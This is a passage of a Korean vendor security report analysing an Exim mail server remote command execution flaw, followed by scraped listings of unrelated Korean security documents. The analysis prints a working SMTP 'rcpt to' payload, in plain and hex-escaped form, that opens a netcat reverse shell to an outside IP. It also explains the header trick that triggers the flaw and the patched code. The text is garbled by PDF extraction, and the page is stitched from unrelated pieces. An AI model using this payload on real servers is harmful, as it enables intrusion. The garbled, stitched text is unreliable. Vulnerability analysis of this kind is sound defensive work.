33 Step 2. 취약점동작원리 취약점동작원리분석을위해취약점테스트시 Exim 서버와송 / 수신한데이터분석을수행한다. 메일메시지작성시작명령어 helo SMTP 프로토콜은인터넷상에서송수신 MTA 사이에서메일을전송할때사용되는인터넷이메일표준 프로토콜이다. helo 는메일전송시작을알리는 SMTP 명령어이다. helo eqst 송신자정보설정명령어 mail from mail from:<> 수신자정보설정명령어 rcpt to 수신자주소 (RCPT TO) 설정시 Exim 확장항목 ${run} 을이용해작성한다. rcpt to: <${run{/bin/sh mkfifo /tmp/test; nc </tmp/test /bin/sh >/tmp/test 2>&1; rm /tmp/test }}@localhost> 이때 \( 백슬래시 ) 를사용하여유효하지않은문자를이스케이프처리한다. rcpt to:<${run{\x2fbin\x2fsh\tc\t\x22mkfifo\x20\x2ftmp\x2ftest\x3b\x20nc\x20192\x2e168\x2e74\x2e168\x \x200 \x3c\x2ftmp\x2ftest\x20\x7c\x20\x2fbin\x2fsh\x20\x3e\x2ftmp\x2ftest\x202\x3e\x261\ x3b\x20\x20rm\x20\x2ftmp\x2ftest\x22}}@localhost> EQST insight 31

34 메일본분설정명령어 DATA receive_header_max 값 ( 기본값 : 30) 이상의 Received : 헤더를설정한다. DATA Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 EQST insight 32

35 Received: 30 Received: 31. Received 헤더를위와같이설정하는이유는다음과같다. deliver_message 함수는메시지가전달될때 호출되며, process_recipients 값은 RECIP_ACCEPT 로기본설정된다. [deliver_message 함수 ] Received 헤더가 31 개로설정되어 received_headers_max( 기본값 :30) 보다커져 else if 제어문조건결과가 참 (True) 이된다. 따라서 process_recipients 값이 RECIP_FAIL_LOOP 로설정된다. [received 헤더값조건문 ] process_recipients 값이 RECIP_FAIL_LOOP 로설정되어, 취약점이발생하는구문을실행되게한다. [process_recipients 값조건문 ] EQST insight 33

36 Step 2. 취약한소스코드분석 아래코드에서사용되는 expand_string() 함수는 ${run{<command> <args>}} 확장항목을인식한다. new address 가전달되는메일의수신자이기때문에, 공격자가전송하는수신자정보 (RCPT TO) 가명령어로 실행된다. [deliver_message 함수 ] expand_string() 함수는 Exim 의문자열확장코드인터페이스이다. [expand_string 함수 ] EQST insight 34

37 Step 3. 패치된소스코드분석 수신자정보 (RCPT TO, new address) 에서유효한주소를추출하는 parse_extract_address 함수가적용되어 공격자가입력한문자열이확장되어처리되지않는다. [deliver.c 소스코드업데이트 ] EQST insight 35

38 INSIGHT 경기도성남시분당구판교로 277번길 23 4&5층 발행인 : SK인포섹 EQST Group 제작 : SK인포섹 Marketing팀 c SK infosec All rights reserved. 본저작물은 SK인포섹의 EQST Group에서작성한콘텐츠로어떤부분도 SK인포섹의서면동의없이사용될수없습니다.

EQST Insight_201910

EQST Insight_201910 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응 MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

클라우드컴퓨팅확산에따른국내경제시사점 클라우드컴퓨팅확산에따른국내경제시사점 * 1) IT,,,, Salesforce.com SaaS (, ), PaaS ( ), IaaS (, IT ), IT, SW ICT, ICT IT ICT,, ICT, *, (TEL)

클라우드컴퓨팅확산에따른국내경제시사점 클라우드컴퓨팅확산에따른국내경제시사점 * 1) IT,,,, Salesforce.com SaaS (, ), PaaS ( ), IaaS (, IT ), IT, SW ICT, ICT IT ICT,, ICT, *, (TEL) 클라우드컴퓨팅확산에따른국내경제시사점 클라우드컴퓨팅확산에따른국내경제시사점 * 1) IT,,,, Salesforce.com SaaS (, ), PaaS ( ), IaaS (, IT ), IT, SW ICT, ICT IT ICT,, ICT, *, (TEL) 02-570-4352 (e-mail) jjoon75@kisdi.re.kr 1 The Monthly Focus.

More information

월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜

월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜 안랩 온라인 보안 매거진 2016. 02 Mobile Security 월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜섬웨어의 모든 것 모바일까지

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전 `16 년랜섬웨어동향및 `17 년전망 2017. 01 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나

More information

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Cloud Friendly System Architecture

Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail 8.13.4 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. sendmail, SPF

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

*****

***** Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현

Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현 02 Web Application Hosting in the AWS Cloud www.wisen.co.kr Wisely Combine the Network platforms Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인

More information

ZConverter Standard Proposal

ZConverter Standard Proposal ZConverter Cloud Migration (OpenStack & CloudStack Migration ) 2015.03 ISA Technologies, Inc D.J Min 회사소개 마이크로소프트 공인인증 ZConverter Server Backup 1. 설 립 : 2004년 11월 01일 (www.zconverter.co.kr) 2. 사업 영역 :

More information

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 모바일 클라우드 서비스 융합사례와 시장 전망 및 신 사업전략 2011. 10 AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 AGENDA 01. 모바일 산업의 환경 변화 가치 사슬의 분화/결합 모바일 업계에서도 PC 산업과 유사한 모듈화/분업화 진행 PC 산업 IBM à WinTel 시대 à

More information

Speaker Topic

Speaker Topic Hybrid Cloud Security Lee Sang-jo Security&Tech team JANUBER 클라우드의진화 Virtual Servers Public Cloud Physical Servers Virtual Desktops Hybrid Environments 2 Hybrid Cloud 환경 Physical Servers Public Cloud Private

More information

Backup Exec

Backup Exec (sjin.kim@veritas.com) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

클라우드컴퓨팅 주요법령해설서 2017. 11. 목차 3... 5 I... 15 II... 39 1. 공공분야... 41 2. 금융분야... 71 3. 의료분야... 81 4. 교육분야... 95 5. 신산업등기타분야... 101 III... 109 요약문 5, 15 3, 1 16~ 18 15 11 16 4, 16 7,,, 5 16 5, 16 7~10,,,

More information

<4D6963726F736F667420576F7264202D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2>

<4D6963726F736F667420576F7264202D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2> 목차(Table of Content) 1. 클라우드 컴퓨팅 서비스 개요... 2 1.1 클라우드 컴퓨팅의 정의... 2 1.2 미래 핵심 IT 서비스로 주목받는 클라우드 컴퓨팅... 3 (1) 기업 내 협업 환경 구축 및 비용 절감 기대... 3 (2) N-스크린 구현에 따른 클라우드 컴퓨팅 기술 기대 증폭... 4 1.3 퍼스널 클라우드와 미디어 콘텐츠 서비스의

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요? 3 Q5. 보안패치는어떻게하나요? 4 Q6. 보안패치가됐

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요? 3 Q5. 보안패치는어떻게하나요? 4 Q6. 보안패치가됐 QnA 형식으로알아보는 WannaCry 랜섬웨어 대응가이드 2017. 05 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. - 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요?

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix 2.7.1 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. postfix,

More information

Windows Server 2012

Windows Server  2012 Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

Office 365, FastTrack 4 FastTrack. Tony Striefel FastTrack FastTrack

Office 365, FastTrack 4 FastTrack. Tony Striefel FastTrack FastTrack FastTrack 1 Office 365, FastTrack 4 FastTrack. Tony Striefel FastTrack FastTrack 5 11 2 FASTTRACK 소개 디지털 혁신은 여기서 시작합니다. Microsoft FastTrack은 Microsoft 클라우드를 사용하여 고객이 신속하게 비즈니스 가치를 실현하도록 돕는 고객 성공 서비스입니다.

More information

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for 메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)

More information

file://\\......\paper\tr2001\tr \spam_relay_test.html

file://\\......\paper\tr2001\tr \spam_relay_test.html CERTCC-KR-TR-2001-12 메일서버의 SPAM RELAY TEST 해킹바이러스상담지원센터 cert@certcc.or.kr 김상철 kims@certcc.or.kr 1. 개요 E-Mail의보편화와맞물려서스팸 (Spam) 메일이라일컬어지는악성광고메일이요즘극성을부리는통에메일서버관리자들 (Postmasters) 은메일송수신에이전트 (MTA : Mail Transport

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

